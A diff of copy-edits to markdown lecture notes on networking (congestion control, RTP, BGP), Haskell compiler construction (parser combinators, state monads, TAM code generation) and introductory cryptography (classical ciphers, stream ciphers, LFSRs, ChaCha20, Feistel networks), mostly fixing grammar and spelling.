||||
Receiver driven packet loss discovery is preferred.
|
||||
Receiver-driven packet loss discovery is preferred.
|
||||
|
||||
- This is because loss events are sent early as possible
|
||||
- This is because loss events are sent as early as possible
|
||||
- This means high responsiveness
|
||||
|
||||
In the case of very high congestion - where there is no feedback from the receiver
|
||||
|
||||
- The pure receiver based loss detection is useless because the sender has no way of calculating packet loss
|
||||
- In these cases sender enters **self-limitation** - where packet loss is assumed and sending rate is decreased or even stopped
|
||||
- Pure receiver-based loss detection is useless because the sender has no way of calculating packet loss
|
||||
- In these cases, the sender enters **self-limitation** - where packet loss is assumed and the sending rate is decreased or even stopped
|
||||
|
||||
#### Adaption
|
||||
#### Adaptation
|
||||
|
||||
Once the parameters of a given link are measured (packet loss and round trip times), there is a range of approaches that could be followed when choosing rate adaptation scheme(s).
|
||||
|
||||
**Equation-based control** uses a control equation that explicitly gives the maximum acceptable sending rate as a function of the recent loss event rate (loss rates).
|
||||
|
||||
**Additive Increase Multiplicative Decrease (AIMD) control** of in response to a single congestion indication.
|
||||
**Additive Increase Multiplicative Decrease (AIMD) control** in response to a single congestion indication.
|
||||
|
||||
###### Decision Function
|
||||
|
||||
Options for Decision function:
|
||||
|
||||
- **On congestion** (overload/packet loss/packet loss increase), **decrease the rate immediately, or periodically****
|
||||
- On absence of congestion** (underload/no packet loss, packet loss decrease), **increase the rate immediately**
|
||||
- **On congestion** (overload/packet loss/packet loss increase), **decrease the rate immediately or periodically**
|
||||
- **In the absence of congestion** (underload/no packet loss, packet loss decrease), **increase the rate immediately**
|
||||
|
||||
###### Increase/decrease function
|
||||
|
||||
@@ -153,12 +153,12 @@ The default for the Internet is **constant linear increase**.
|
||||
|
||||
One could argue that a loss estimate of zero indicates that there is no congestion and thus the sending rate should be increased with the maximum possible increase factor until a loss event occurs.
|
||||
|
||||
- However, this approach **causes instabilities** in the sending rate and is very susceptible to a noisy packet drop rates.
|
||||
- However, this approach **causes instabilities** in the sending rate and is very susceptible to noisy packet drop rates.
|
||||
|
||||
Options for **decrease phase**
|
||||
|
||||
- constant multiplicative decrease factor, TCP-like or TCP-similar like.
|
||||
- linear decrease
|
||||
- Linear decrease
|
||||
- straight jump to the expected value (calculated by the formula)
|
||||
|
||||
The default for the internet is multiplicative decrease (halving)
|
||||
@@ -172,21 +172,21 @@ Decision frequency specifies **how often to change the rate.** **Based on system
|
||||
- The feedback delay **is the time between changing the rate and detecting the network’s reaction to that change.**
|
||||
- It is suggested that equation-based schemes adjust their rates **not more than once per RTT**.
|
||||
- Changing the rate too often results in oscillation
|
||||
- Infrequent change of the rate leads to an unresponsive behaviour.
|
||||
- Infrequent changes in the rate lead to unresponsive behaviour.
|
||||
|
||||
###### Self Clocking
|
||||
|
||||
Aim is that transmission spacing matches bottleneck rate
|
||||
The aim is for transmission spacing to match the bottleneck rate.
|
||||
|
||||
- Avoids consistent queuing at bottleneck
|
||||
- Queue to smooth out short-term variation
|
||||
|
||||
##### Congestion Control
|
||||
|
||||
Aim to obey **conversation of packets**
|
||||
Aim to obey **conservation of packets**
|
||||
|
||||
- In equilibrium flow is conservative
|
||||
- New packet doesn't enter until one leaves
|
||||
- A new packet doesn't enter until one leaves
|
||||
|
||||
This fails in three ways:
|
||||
|
||||
@@ -222,7 +222,7 @@ TCP is not always useful
|
||||
|
||||
- Reliability can cause untimely delivery
|
||||
|
||||
Audio/Video codecs usually produce frames (not continuous bytestream)
|
||||
Audio/video codecs usually produce frames (not a continuous byte stream).
|
||||
|
||||
- Losing a frame is better than delaying all subsequent data
|
||||
|
||||
@@ -230,6 +230,6 @@ UDP encapsulates media using **R**eal **T**ime **P**rotocol
|
||||
|
||||
- Sequencing, time stamping, delivery monitoring, no quality of service
|
||||
- Adds a control channel
|
||||
- Back channel to report statistics & participants
|
||||
- Back channel to report statistics and participants
|
||||
- Transport only
|
||||
- Leaves encodings & floor control to application
|
||||
- Leaves encodings and floor control to the application
|
||||
@@ -25,8 +25,8 @@ The internet inter-domain routing protocol
|
||||
- Logical construct only
|
||||
- No meaning outside BGP
|
||||
- Do not map simply onto ISPs or networks
|
||||
- Currently ~493,000 prefixes & ~46,000 ASs
|
||||
- Because we have less ASs, the routing is easily -> less complex
|
||||
- Currently ~493,000 prefixes and ~46,000 ASs
|
||||
- Because we have fewer ASs, routing is easier and less complex
|
||||
- Reduces complexity
|
||||
- Speeds up performance
|
||||
|
||||
@@ -44,8 +44,8 @@ Sessions between peers have:
|
||||
|
||||
A BGP peer typically has many sessions
|
||||
|
||||
- Logically, for each peer, it receives the information about routing from peers, this is sorted into `Adj-RIB-in` table.
|
||||
- After processing, it produces a `Adj-RIB-out` table which it sends to other peers
|
||||
- Logically, for each peer, it receives routing information from peers. This is sorted into an `Adj-RIB-in` table.
|
||||
- After processing, it produces an `Adj-RIB-out` table which it sends to other peers
|
||||
- Advertisements received and to be sent
|
||||
- Generates a local RIB table from `Adj-RIB-in`
|
||||
- Routes to use and potentially distribute
|
||||
@@ -107,7 +107,7 @@ Drop prefix if:
|
||||
- `NEXT_HOP` is unreachable via local routing table
|
||||
- Local AS appears in `AS_PATH` (packet in a loop)
|
||||
|
||||
Then (commonly) apply following preference:
|
||||
Then (commonly) apply the following preferences:
|
||||
|
||||
1. Higher `weight` (local to this router)
|
||||
2. Highest `LOCAL_PREF`
|
||||
@@ -139,7 +139,7 @@ Can distribute `IBGP` routes on `IBGP` sessions
|
||||
- Two standard solutions
|
||||
1. **Route Reflectors**
|
||||
- Super nodes re-advertising `IBGP` routes
|
||||
- Allows for hierarchy
|
||||
- Allows for a hierarchy
|
||||
2. **AS Confederations**
|
||||
- split AS up into mini-ASs
|
||||
|
||||
@@ -147,12 +147,12 @@ Can distribute `IBGP` routes on `IBGP` sessions
|
||||
|
||||
- Handling link failures
|
||||
- Bind to loopback
|
||||
- If it cant talk to other nodes, will only support communication internally
|
||||
- If it can't talk to other nodes, it will only support communication internally
|
||||
- Flap damping
|
||||
- A warning message saying don't send traffic to me
|
||||
- This can make things worse if this message is delayed
|
||||
- Process failures
|
||||
- Out of memory error due to too many routes
|
||||
- Out-of-memory error due to too many routes
|
||||
|
||||
##### Network Inter-connection
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# Compilers - COMP 3012
|
||||
|
||||
A compiler is a tool that maps one language into another language. It takes a program written in a source programming language and maps it to program written in a target programming language. A compiler is written in an **implementation language**.
|
||||
A compiler is a tool that maps one language into another language. It takes a program written in a source programming language and maps it to a program written in a target programming language. A compiler is written in an **implementation language**.
|
||||
|
||||

|
||||
|
||||
@@ -10,21 +10,21 @@ An **interpreter** is a program that takes a source program and executes the pro
|
||||
|
||||

|
||||
|
||||
> NOTE: Java uses both. A java source program is compiled into byte code (by a compiler) which is then executed by an interpreter (called java virtual machine - JVM). JVM will also compile fragments of code so that if there is a call back, it can execute the compiled code. This is called compilation on the fly.
|
||||
> NOTE: Java uses both. A Java source program is compiled into bytecode (by a compiler), which is then executed by an interpreter (called the Java virtual machine - JVM). The JVM will also compile fragments of code so that if there is a call back, it can execute the compiled code. This is called compilation on the fly.
|
||||
|
||||
Compilers will often use an **intermediate representation (IR)** to bridge the gap between the source language and the executable language. Converting source language to IR is called **front end**, where as converting IR to executable code is called **back end**.
|
||||
Compilers will often use an **intermediate representation (IR)** to bridge the gap between the source language and the executable language. Converting source language to IR is called **front end**, whereas converting IR to executable code is called **back end**.
|
||||
|
||||
* The front end focuses on understand the source-language program.
|
||||
* The back end focuses on mapping programs to the target machine
|
||||
- The front end focuses on understanding the source-language program.
|
||||
- The back end focuses on mapping programs to the target machine
|
||||
|
||||

|
||||
|
||||
* The front end, intermediate representation and the back end are all part of the compiler.
|
||||
- The front end, intermediate representation and the back end are all part of the compiler.
|
||||
|
||||
IR is stored as an Abstract Syntax Tree **AST**.
|
||||
|
||||
The syntactic details needed for parsing the source program are represented in the structure of the tree.
|
||||
|
||||
The **IR** could be broken down into many sub-steps i.e. a IR1 could be created which is then ran through an optimiser to create IR2 which is fed into the back end instead of IR1. This is called a *three-phase compiler*.
|
||||
The **IR** could be broken down into many sub-steps, i.e. an IR1 could be created, which is then run through an optimiser to create IR2, which is fed into the back end instead of IR1. This is called a *three-phase compiler*.
|
||||
|
||||

|
||||
@@ -28,7 +28,7 @@ exp -> exp + exp
|
||||
-> 7 + (10 / 3) * (-2)
|
||||
```
|
||||
|
||||
This grammar is **ambiguous**, this means one input expression could be generated in several different ways.
|
||||
This grammar is **ambiguous**: this means one input expression could be generated in several different ways.
|
||||
|
||||
$$
|
||||
5 - 4 \times 7
|
||||
@@ -43,7 +43,7 @@ exp -> exp - exp
|
||||
-> 5 - 4 * 7
|
||||
```
|
||||
|
||||
However there is another way to derive this expression starting with `*`
|
||||
However, there is another way to derive this expression starting with `*`
|
||||
|
||||
```haskell
|
||||
exp -> exp * exp
|
||||
@@ -52,7 +52,7 @@ exp -> exp * exp
|
||||
-> 5 - 4 * 7
|
||||
```
|
||||
|
||||
These give us two different ASTs, which gives us two different numeric answers. We must use more terminal symbols to follow BIDMAS.
|
||||
These give us two different ASTs, which give us two different numeric answers. We must use more terminal symbols to follow BIDMAS.
|
||||
|
||||

|
||||
|
||||
@@ -74,7 +74,7 @@ This grammar is unique (non-ambiguous)
|
||||
|
||||
## Semantics of Expressions
|
||||
|
||||
On the left hand side the $+$ is just a symbol, however on the right hand side it is an arithmetic sum operation.
|
||||
On the left-hand side, the $+$ is just a symbol; however, on the right-hand side it is an arithmetic sum operation.
|
||||
|
||||
$[\![ exp + exp ]\!] = [\![exp ]\!] + [\![exp ]\!]$ | $[\![ exp - exp ]\!] = [\![exp ]\!] - [\![exp ]\!]$ ... same for all binary operations
|
||||
|
||||
@@ -99,14 +99,12 @@ $[\![d_0 ]\!] = value(d_0)$
|
||||
|
||||
$[\![d_s d_0]\!] = [\![d_s ]\!]\times10 + value(d_0)$
|
||||
|
||||
|
||||
|
||||
## Scanners and Parsers
|
||||
|
||||

|
||||
|
||||
Scanners take the source language as input and outputs a stream of tokens.
|
||||
Scanners take the source language as input and output a stream of tokens.
|
||||
|
||||
A **token** is a chunk of input; "words" of the language eg. integers, operator symbols, identifiers (function & variable names etc), parenthesis.
|
||||
A **token** is a chunk of input; "words" of the language, e.g. integers, operator symbols, identifiers (function & variable names etc.), parentheses.
|
||||
|
||||
The **grammar of tokens is always regular**, this means it can be generated and recognised by a DFA (deterministic finite automata).
|
||||
The **grammar of tokens is always regular**: this means it can be generated and recognised by a DFA (deterministic finite automaton).
|
||||
@@ -2,8 +2,6 @@
|
||||
|
||||
In our parser - there's a lot of repeated code and a lot of cases.
|
||||
|
||||
|
||||
|
||||
Types of scanner and parser are very similar
|
||||
|
||||
```haskell
|
||||
@@ -38,4 +36,3 @@ parseParenthesis = do symbol '('
|
||||
symbol ')'
|
||||
return t
|
||||
```
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# Functor
|
||||
|
||||
Parsing an expression in parenthesis:
|
||||
Parsing an expression in parentheses:
|
||||
|
||||
```haskell
|
||||
parseP :: Parser AST
|
||||
@@ -22,9 +22,9 @@ Before we write this sort of code, we need to understand `type classes` (especia
|
||||
| String | Functor |
|
||||
| | Monad |
|
||||
|
||||
**Eq**: typeclass equality; A type can only be typeclass equality if two like types can be compared
|
||||
**Eq**: type class for equality; a type can only be in this type class if two values of that type can be compared
|
||||
|
||||
A type can be a *member* (instance) of a type class, meaning that if has the properties/functions that the class requires
|
||||
A type can be a *member* (instance) of a type class, meaning that it has the properties/functions that the class requires
|
||||
|
||||
e.g. `Bool` is an instance of `Eq` and `Show`
|
||||
|
||||
@@ -61,7 +61,7 @@ newtype Parser a = P (String -> [a, String])
|
||||
|
||||
**Parser AST** is a type
|
||||
|
||||
Functor is a typeclass of which `parser` is an instance
|
||||
Functor is a type class of which `parser` is an instance
|
||||
|
||||
##### Functor
|
||||
|
||||
@@ -95,7 +95,4 @@ fmap id = id -- identity
|
||||
fmap (f . g) = fmap f . fmap g
|
||||
```
|
||||
|
||||
Haskell doesn't enforce these rules however it is convention.
|
||||
|
||||
|
||||
|
||||
Haskell doesn't enforce these rules; however, following them is convention.
|
||||
@@ -28,7 +28,7 @@ fmap2 :: (a -> b -> c) -> f a -> f b -> f c
|
||||
fmap3 :: (a -> ... n) -> f a -> ... f n
|
||||
```
|
||||
|
||||
`Functor f` can do `fmap1` however cannot do `fmap0` or `fmap2` etc.
|
||||
`Functor f` can do `fmap1`; however, it cannot do `fmap0` or `fmap2` etc.
|
||||
|
||||
**Remember**: `a -> b -> c == a -> (b -> c)`
|
||||
|
||||
@@ -92,4 +92,3 @@ All parse does is apply a parser
|
||||
Where `P` is the constructor
|
||||
|
||||
`parse ( P p ) = p`
|
||||
|
||||
@@ -22,8 +22,6 @@ intORbin :: Parser Int
|
||||
expr :: Parser AST
|
||||
```
|
||||
|
||||
|
||||
|
||||
```
|
||||
λ> parse (symbol "something") "nothing"
|
||||
[]
|
||||
@@ -59,8 +57,6 @@ instance Functor Parser where
|
||||
in [(g x, src1)] )
|
||||
```
|
||||
|
||||
|
||||
|
||||
```
|
||||
λ> parse (fmap (+3) integer) "42 blah blah"
|
||||
[(45, blah blah)]
|
||||
@@ -75,7 +71,7 @@ instance Functor Parser where
|
||||
*** Exception Non-exhaustive patterns
|
||||
```
|
||||
|
||||
fixing `fmap`
|
||||
Fixing `fmap`
|
||||
|
||||
```haskell
|
||||
fmap g pa = P (\src -> [ (g x, src1) | (x,src1) <- parse pa src])
|
||||
@@ -152,11 +148,9 @@ pf <*> pa = P (\src -> [ (f x, src2) | (f,src1) <- parse pf src,
|
||||
[(10201, ""), (25, "")]
|
||||
```
|
||||
|
||||
|
||||
|
||||
### Monad Class of Parser
|
||||
|
||||
Monad class will facilitate the use of `do` notation.
|
||||
The Monad class will facilitate the use of `do` notation.
|
||||
|
||||
```haskell
|
||||
instance Monad Parser where
|
||||
@@ -228,7 +222,7 @@ pa >>= fpb = P (\src -> [ r | (x,src1) <- parse pa src,
|
||||
-- second part will look at 113, realise it is not a binary digit and just read 11 which is equal to 3 hence true
|
||||
```
|
||||
|
||||
What is the do notation and how is it connected to the bind function, we will show this by writing a simple parser
|
||||
What is the `do` notation and how is it connected to the bind function? We will show this by writing a simple parser
|
||||
|
||||
```haskell
|
||||
pairSum :: Parser Int
|
||||
@@ -262,8 +256,6 @@ parse (symbol "number" >> integer) "number 9"
|
||||
NOTE: >> is a non-dependant bind
|
||||
```
|
||||
|
||||
|
||||
|
||||
```haskell
|
||||
the grammer
|
||||
--funApp ::= ( simpleFun integer )
|
||||
@@ -402,7 +394,7 @@ string (c:cs) = do char c
|
||||
[(' ',"hello")]
|
||||
```
|
||||
|
||||
We have to fix leading white space causing failure
|
||||
We have to fix leading whitespace causing failure
|
||||
|
||||
```haskell
|
||||
space :: Parser ()
|
||||
@@ -463,4 +455,3 @@ expr = do t1 <- mexpr
|
||||
<|>
|
||||
return t1)
|
||||
```
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# Compiling Variables
|
||||
|
||||
A variable is identified by a alphanumeric string. We can store this as a list of pairs, with the variables identifier and its value.
|
||||
A variable is identified by an alphanumeric string. We can store this as a list of pairs, with the variable's identifier and its value.
|
||||
|
||||
Variable Environment or VarEnv - `[(Identifier, Stack Address)]`
|
||||
|
||||
@@ -8,7 +8,7 @@ A stack address is an integer value that specifies where in the stack that varia
|
||||
|
||||
The bottom of the stack is indexed `0`.
|
||||
|
||||
Lets say our environment consists of 3 variables named x,y,z. It would look like:
|
||||
Let's say our environment consists of 3 variables named x, y, z. It would look like:
|
||||
|
||||
`[("z",2), ("y",1), ("x",0)]`
|
||||
|
||||
@@ -18,13 +18,13 @@ Lets say our environment consists of 3 variables named x,y,z. It would look like
|
||||
| y | 2 | 1 |
|
||||
| z | 9 | 2 |
|
||||
|
||||
To get the value of a variable from the stackk, TAM uses the instruction `LOADL a` where `a` is a stack address. `LOADL` will get the value and copy the value to the top of the stack.
|
||||
To get the value of a variable from the stack, TAM uses the instruction `LOADL a` where `a` is a stack address. `LOADL` will get the value and copy the value to the top of the stack.
|
||||
|
||||
`LOAD a` - copy address a to top of stack
|
||||
|
||||
`STORE a` - pop top of stack to address a
|
||||
|
||||
For example if `LOADL 2` is called, it will effect the stack in the following way:
|
||||
For example, if `LOADL 2` is called, it will affect the stack in the following way:
|
||||
|
||||
| Variables | Stack (Values) | Index |
|
||||
| :-------: | :------------: | :---: |
|
||||
@@ -38,7 +38,7 @@ For example if `LOADL 2` is called, it will effect the stack in the following wa
|
||||
expCode :: VarEnv -> Expr -> [TAMInst]
|
||||
```
|
||||
|
||||
Before we just called the abstract syntax tree `AST` however with the extended grammar now we will have multiple ASTs, one for programs, one for commands, expressions. The AST for expressions we call `Expr`.
|
||||
Before, we just called the abstract syntax tree `AST`; however, with the extended grammar, we will now have multiple ASTs: one for programs, one for commands and one for expressions. The AST for expressions we call `Expr`.
|
||||
|
||||
Remember in our compiler, the stack is represented and stored as a list, with the top of the stack being the head of the list.
|
||||
|
||||
@@ -90,7 +90,7 @@ Example: $s_n$ could be your bank balance and $a_n$ could be the purchase histor
|
||||
- States are VarEnv & next free address space for next variable
|
||||
- Outputs are TAM instructions
|
||||
|
||||
We to define a type that models a state transform, while at the same time producing a result. This is where a state monad comes in.
|
||||
We need to define a type that models a state transform, while at the same time producing a result. This is where a state monad comes in.
|
||||
|
||||
```haskell
|
||||
newtype ST st a = S (\st -> (a, st))
|
||||
|
||||
@@ -26,7 +26,7 @@ var z;
|
||||
var w := x * y - 2
|
||||
```
|
||||
|
||||
The parser will turn this into a list of AST for declarations
|
||||
The parser will turn this into a list of ASTs for declarations
|
||||
|
||||
Then we have to use this to build a variable environment, and generate TAM code to write the values of the variables onto the stack.
|
||||
|
||||
@@ -91,7 +91,7 @@ command ::= identifier := expr
|
||||
| begin commands end
|
||||
```
|
||||
|
||||
Here: `:=`, `if`, `then`, `else`, `while`, `do`, `getint`, `printint`, `begin`, `end`, `(`, `)` are terminal
|
||||
Here: `:=`, `if`, `then`, `else`, `while`, `do`, `getint`, `printint`, `begin`, `end`, `(`, `)` are terminals
|
||||
|
||||
```haskell
|
||||
data Command =
|
||||
@@ -134,7 +134,7 @@ func :: a -> b
|
||||
|
||||
Note file name must start with a capital
|
||||
|
||||
When you import a module, can can use functions defined in the module
|
||||
When you import a module, you can use functions defined in the module
|
||||
|
||||
```haskell
|
||||
data FileType = EXP | TAM
|
||||
@@ -143,7 +143,7 @@ data Option = Trace | Run | Evaluate
|
||||
main :: IO () --input output monad
|
||||
```
|
||||
|
||||
this is the entry point, to compile
|
||||
This is the entry point; to compile:
|
||||
|
||||
```shell
|
||||
$ ghc Main.hs -o aec
|
||||
@@ -161,4 +161,3 @@ stGet = S (\s -> (s,s))
|
||||
stRevise :: (st -> st) -> ST st ()
|
||||
stRevise f = stGet >>= stUpdate . f
|
||||
```
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
**Mini Triangle Programs** -$parse$-> **AST** -$Code\space Generation$-> **TAM Programs** -$execute$ -> **Output**
|
||||
|
||||
Before we could generate a list of instructions to be executed in sequence, now we need to implement code thats conditionally executed or executed multiple times.
|
||||
Before, we could generate a list of instructions to be executed in sequence; now we need to implement code that's conditionally executed or executed multiple times.
|
||||
|
||||
```haskell
|
||||
--Code for dealing with functions and commands
|
||||
@@ -71,7 +71,7 @@ JUMPIFZ "label3"
|
||||
|
||||
Labels must **always** be **unique**.
|
||||
|
||||
This would require a global variable in our compiler to count the number of labels, haskell doesnt not allow global variables.
|
||||
This would require a global variable in our compiler to count the number of labels; Haskell does not allow global variables.
|
||||
|
||||
We can use the `stateMonad` instead.
|
||||
|
||||
|
||||
@@ -4,7 +4,7 @@ You can think of a monad as a container for a data type
|
||||
|
||||
If $M$ is a monad, that means an element of $M$: $M_a$ is some sort of container where $a$ is any datatype
|
||||
|
||||
One of the purposes of the `do` notation is to operate on the whole data structure by specify operations that must apply to each of the elements in the data structure, without having to specify the whole structure.
|
||||
One of the purposes of the `do` notation is to operate on the whole data structure by specifying operations that must apply to each of the elements in the data structure, without having to specify the whole structure.
|
||||
|
||||
$$
|
||||
M_a=\{x_1, x_2, x_3,...\}
|
||||
@@ -41,7 +41,7 @@ pure x
|
||||
|
||||
Monads can have containers within containers
|
||||
|
||||
Assume we have function `makeBlob` that maps every element of $a$ to an element of $M_b$
|
||||
Assume we have a function `makeBlob` that maps every element of $a$ to an element of $M_b$
|
||||
|
||||
```haskell
|
||||
makeBlob :: a -> Mb
|
||||
|
||||
@@ -10,7 +10,7 @@
|
||||
|
||||
**Asymmetric**
|
||||
|
||||
>“Methods which use separate, but related, private and public keys.”
|
||||
> “Methods which use separate, but related, private and public keys.”
|
||||
|
||||
**Protocols**
|
||||
|
||||
@@ -20,7 +20,7 @@
|
||||
|
||||
> “The science and art of breaking cryptosystems.”
|
||||
|
||||
### Modern Cyptography (1970-)
|
||||
### Modern Cryptography (1970-)
|
||||
|
||||
**Fundamentally different** - a scientific and mathematical discipline
|
||||
|
||||
@@ -53,7 +53,6 @@
|
||||
- This is useful as it avoids overflow errors
|
||||
- When we add or multiply two 1 byte binary digits, the result will always be 1 byte
|
||||
|
||||
|
||||
###### Congruence
|
||||
|
||||
Let $a, r, m \in \mathbb{Z}$ and $m > 0$
|
||||
@@ -73,7 +72,7 @@ This can be rewritten as: $a = q\cdot m+r$
|
||||
###### Equivalence Classes
|
||||
|
||||
- The sets of all integers **mod 5** form a series of equivalence classes
|
||||
- All these numbers act the same in any modluo sum
|
||||
- All these numbers act the same in any modulo sum
|
||||
|
||||
For example
|
||||
|
||||
@@ -102,7 +101,7 @@ The integer ring $\mathbb{Z}_m$ consists of:
|
||||
1. $a+b \equiv c \space (mod\space m), (c\in \mathbb{Z})$
|
||||
2. $a\cdot b \equiv d \space (mod\space m), (d\in \mathbb{Z})$
|
||||
|
||||
Any time you add or multiply any two numbers in the set, the result is always in the set. We use $\equiv$ instead of $=$ as it could be an intermediatary number e.g. 12 instead of 2.
|
||||
Any time you add or multiply any two numbers in the set, the result is always in the set. We use $\equiv$ instead of $=$ as it could be an intermediate number, e.g. 12 instead of 2.
|
||||
|
||||
##### Properties of Rings
|
||||
|
||||
@@ -158,7 +157,7 @@ $$
|
||||
|
||||
##### Frequency Analysis
|
||||
|
||||
- The frequency of occurrences of each character are very consistent
|
||||
- The frequency of occurrences of each character is very consistent
|
||||
- The longer a cipher text is, the easier this becomes
|
||||
|
||||
#### Affine Cipher
|
||||
@@ -174,23 +173,23 @@ $$
|
||||
|
||||
where $k=(a,b)$ and $gcd(a,26)=1$
|
||||
|
||||
This is a multiplication and a addition analagous to $y=mx+c$
|
||||
This is a multiplication and an addition analogous to $y=mx+c$
|
||||
|
||||
In a Affine cipher, letters can be themselves
|
||||
In an Affine cipher, letters can be themselves
|
||||
|
||||
- The keyspace of an affine cipher
|
||||
- a can be 0-25
|
||||
- b can be 0-12
|
||||
- 25*12=300
|
||||
- More secure than a caesar cipher
|
||||
- More secure than a Caesar cipher
|
||||
|
||||
Frequency analysis can still be used, in this case the columns will not only be shifted, but jumbled aswell.
|
||||
Frequency analysis can still be used; in this case the columns will not only be shifted, but jumbled as well.
|
||||
|
||||
- This is not hard to crack
|
||||
|
||||
#### The Vigenere Cipher
|
||||
|
||||
- An early stream cipher, the Vigenere cipher is a shift cipher with a running key
|
||||
- Unlike caesar cipher, the key is repeated for as long as required.
|
||||
- Unlike the Caesar cipher, the key is repeated for as long as required.
|
||||
- It is the equivalent to multiple interleaved Caesar ciphers
|
||||
- Spreads outs occurrances of characters making frequency analysis hard.
|
||||
- Spreads out occurrences of characters, making frequency analysis hard.
|
||||
@@ -20,9 +20,7 @@ d_{s_i} (y_i) \equiv (x_i + 0\cdot s_i \space (mod\space 2) \\
|
||||
d_{s_i} (y_i) \equiv x_i
|
||||
$$
|
||||
|
||||
Note: 2 % 2 is 0, its like **xor**-ing twice.
|
||||
|
||||
|
||||
Note: 2 % 2 is 0; it's like **xor**-ing twice.
|
||||
|
||||
#### Security of XOR
|
||||
|
||||
@@ -58,7 +56,7 @@ The security of a stream cipher depends entirely on the nature of the key stream
|
||||
|
||||
###### Linear Congruential Generator
|
||||
|
||||
Cs `rand()` function, this is a PRNG
|
||||
C's `rand()` function is a PRNG
|
||||
|
||||
$$
|
||||
s_0 = 12345 \\
|
||||
@@ -76,7 +74,7 @@ $$
|
||||
|
||||
#### Unconditional Security
|
||||
|
||||
A crypto-system is **unconditional security** is unconditionally or information-theoretically secure if it cannot be broken, even with infinite computational resources.
|
||||
A cryptosystem has **unconditional security**: it is unconditionally or information-theoretically secure if it cannot be broken, even with infinite computational resources.
|
||||
|
||||
**Perfect Secrecy**: The cipher-text should reveal no information about the plain text
|
||||
|
||||
@@ -84,7 +82,7 @@ $\forall_{m_0, m_1} \in M$ where $|m_0| = |m_1|$ and $\forall_c \in C$
|
||||
|
||||
$Pr[E(k,m_0) = c] = Pr[E(k,m_1) = c]$
|
||||
|
||||
The probability that $m_0$ encrypts to $c$ is the same as the probability of $m_1$ also encrypted to $c$
|
||||
The probability that $m_0$ encrypts to $c$ is the same as the probability of $m_1$ also being encrypted to $c$
|
||||
|
||||
## One Time Pad
|
||||
|
||||
@@ -134,7 +132,7 @@ $$
|
||||
|
||||
#### Crib Dragging
|
||||
|
||||
This involves guessing $M_1$, this can be a common message such as `HTTP` request.
|
||||
This involves guessing $M_1$; this can be a common message such as an `HTTP` request.
|
||||
|
||||
This can be automated by checking $M_1$ over different parts of $M_2$.
|
||||
|
||||
@@ -145,9 +143,9 @@ This can be automated by checking $M_1$ over different parts of $M_2$.
|
||||
|
||||
- Numbers used once or *nonces* are vital for stream cipher security
|
||||
- Instead of always using a unique key, the security requirement is you always use a unique (key + nonce) pair
|
||||
- Nonces are not secret, they are public random seed for a key stream
|
||||
- Nonces are not secret; they are public random seeds for a key stream
|
||||
|
||||
### Could we use a LCG?
|
||||
### Could we use an LCG?
|
||||
|
||||
- LCG - Linear congruential generators
|
||||
- Seed using some key, then
|
||||
|
||||
@@ -2,14 +2,14 @@
|
||||
|
||||
### Pseudo-randomness
|
||||
|
||||
- TRNGs - true Random Number Generator
|
||||
- TRNGs - True Random Number Generators
|
||||
- Not feasible at scale
|
||||
- PRNGs - Pseudo Random Number Generator
|
||||
- CSPRNGs - Cryptographically Secure Pseudo Random Number Generator
|
||||
- PRNGs - Pseudo-random Number Generators
|
||||
- CSPRNGs - Cryptographically Secure Pseudo-random Number Generators
|
||||
|
||||
#### LFSRs
|
||||
|
||||
- A Linear-feedback Shift Register us a register if buts whose positions shift to the right
|
||||
- A linear-feedback shift register is a register of bits whose positions shift to the right
|
||||
- Usually comprised of flip-flops, the last bit represents the output
|
||||
|
||||
(Where the squares at the bottom are flip-flops)
|
||||
@@ -27,8 +27,8 @@ $$
|
||||
|
||||
- We usually represent m-bit LFSRs using polynomials of degree m.
|
||||
- In general $P(x)=x^m + p_{m-1}x^{m-1} + ... + p_1x + p_0$
|
||||
- LFSRs that have primitive polynoimials produce sequences of maximum length
|
||||
- There are many and are easily computed
|
||||
- LFSRs that have primitive polynomials produce sequences of maximum length
|
||||
- There are many, and they are easily computed
|
||||
- $x^5 + x^2 + 1$ has 31 states
|
||||
- $x^{10} + x^3 + 1$ has 1023
|
||||
- $x^{85}+x^8+x^2+x+1$ has $10^{26}$ states
|
||||
@@ -55,14 +55,14 @@ $s_{2m+1} \equiv s_{2m-1}p_{m} + ... + s_mp_1 + s_{m-1}p_0$
|
||||
|
||||
- LFSRs are much more cryptographically secure if we combine more than one together in a non-linear way.
|
||||
|
||||
Trivium is 3 LFSR in a row
|
||||
Trivium is 3 LFSRs in a row
|
||||
|
||||
- Feedback between each with non-linear AND gates
|
||||
- Initialises the LFSR with an 80-bit key and 80-bit random value
|
||||
|
||||
### ChaCha20
|
||||
|
||||
- ChaCha is a stream cipher written by Daniel Berstein
|
||||
- ChaCha is a stream cipher written by Daniel Bernstein
|
||||
- A modification of a previous cipher, Salsa
|
||||
- Very lightweight, using only `add`, `xor` and rotate operations
|
||||
- One of two ciphers in `TLS 1.3`
|
||||
@@ -72,7 +72,7 @@ Trivium is 3 LFSR in a row
|
||||
- Suppose someone skips ahead on a video stream, the cipher can skip unlike other synchronous stream ciphers
|
||||
- Works well on low power devices, due to simplicity of encryption
|
||||
- Once the input and the mixed words are added together it is hard to know what the starting thing was
|
||||
- e.g. what two numbers have i added to make 100
|
||||
- e.g. what two numbers have I added to make 100
|
||||
|
||||
ChaCha performs **20** rounds
|
||||
|
||||
|
||||
@@ -22,17 +22,17 @@
|
||||
|
||||
Shannon called a cipher like this a **product cipher**
|
||||
|
||||
### Feistal Network
|
||||
### Feistel Network
|
||||
|
||||
- A Feistal Network is one mechanism used to create block ciphers
|
||||
- Developed by Horst Feistal while he worked at IBM
|
||||
- A Feistel network is one mechanism used to create block ciphers
|
||||
- Developed by Horst Feistel while he worked at IBM
|
||||
- Underpins DES, GOST, Blowfish, Twofish and numerous others.
|
||||
|
||||

|
||||
|
||||
- To decrypt, we run the encrypted bits through the network again
|
||||
|
||||
##### A Single Feistal Round
|
||||
##### A Single Feistel Round
|
||||
|
||||
- During each round, only half of the block is encrypted
|
||||
|
||||
@@ -58,15 +58,15 @@ Note - the last round does a final swap so the left and right are in the correct
|
||||
|
||||
Basically the `xor`s cancel themselves out, the most important part is choosing a good function $f$
|
||||
|
||||
#### About Feistal Networks
|
||||
#### About Feistel Networks
|
||||
|
||||
- 1 or 2 rounds is not sufficient
|
||||
- 1 or 2 rounds are not sufficient
|
||||
- Luby and Rackoff show that if $f$ is a cryptographically secure pseudorandom function then:
|
||||
